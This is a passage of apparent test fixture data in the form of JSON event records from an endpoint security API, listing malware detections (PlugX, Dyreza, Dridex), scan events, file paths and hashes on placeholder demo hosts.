Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155907656771960834","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Local Settings\\Temp\\RarSFX1\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":3596,"disposition":"Malicious","file_name":"ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155907648182026000,"timestamp":1610705261,"timestamp_nanoseconds":724000000,"date":"2021-01-15T10:07:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155907648182026241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ps.exe","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Desktop\\ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"},"archived_file":{"disposition":"Malicious","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48"}},"parent":{"process_id":3896,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b18a0d4beba606bf30f5010ba3c72abafac80d5f303a8bffb24d7f7b78b786e6","sha1":"eadce51c88c8261852c1903399dde742fba2061b","md5":"b60dddd2d63ce41cb8c487fcfbb6419e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209700347052000,"timestamp":1610705254,"timestamp_nanoseconds":882000000,"date":"2021-01-15T10:07:34+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209700347052056","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256485970936000,"timestamp":1610705253,"timestamp_nanoseconds":307000000,"date":"2021-01-15T10:07:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256485970935854","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209670282281000,"timestamp":1610705247,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:07:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209670282280983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256434431328000,"timestamp":1610705241,"timestamp_nanoseconds":295000000,"date":"2021-01-15T10:07:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256434431328301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900178000400,"timestamp":1610705238,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:07:18+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"GenericKD:Dyreza-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705238,"start_date":"2021-01-15T10:07:18+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb"},"parent":{"disposition":"Malicious","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209605857772000,"timestamp":1610705232,"timestamp_nanoseconds":855000000,"date":"2021-01-15T10:07:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209605857771542","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":358000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655340","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"VyCoQwOmMNmrVgs.exe","file_path":"\\\\?\\C:\\Windows\\VyCoQwOmMNmrVgs.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":2812,"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":343000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655339","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":280000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"VyCoQwOmMNmrVgs.exe","file_path":"\\\\?\\C:\\Windows\\VyCoQwOmMNmrVgs.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":2812,"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":249000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256387186688000,"timestamp":1610705230,"timestamp_nanoseconds":890000000,"date":"2021-01-15T10:07:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256387186688040","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":3652,"disposition":"Malicious","file_name":"webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256387186688000,"timestamp":1610705230,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:07:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256387186688039","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256387186688000,"timestamp":1610705230,"timestamp_nanoseconds":625000000,"date":"2021-01-15T10:07:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256387186688038","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256382891721000,"timestamp":1610705229,"timestamp_nanoseconds":658000000,"date":"2021-01-15T10:07:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256382891720741","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209575793000000,"timestamp":1610705225,"timestamp_nanoseconds":195000000,"date":"2021-01-15T10:07:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209575793000469","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364862671421000,"timestamp":1610705225,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:07:05+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\DVD Maker","clean":true,"scanned_files":9,"scanned_processes":0,"scanned_paths":2,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364858376454000,"timestamp":1610705224,"timestamp_nanoseconds":772000000,"date":"2021-01-15T10:07:04+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\DVD Maker"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256331352113000,"timestamp":1610705217,"timestamp_nanoseconds":646000000,"date":"2021-01-15T10:06:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256331352113188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209511368491000,"timestamp":1610705210,"timestamp_nanoseconds":812000000,"date":"2021-01-15T10:06:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209511368491028","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364793951945000,"timestamp":1610705209,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:06:49+00:00","event_type":"Scan Completed, No 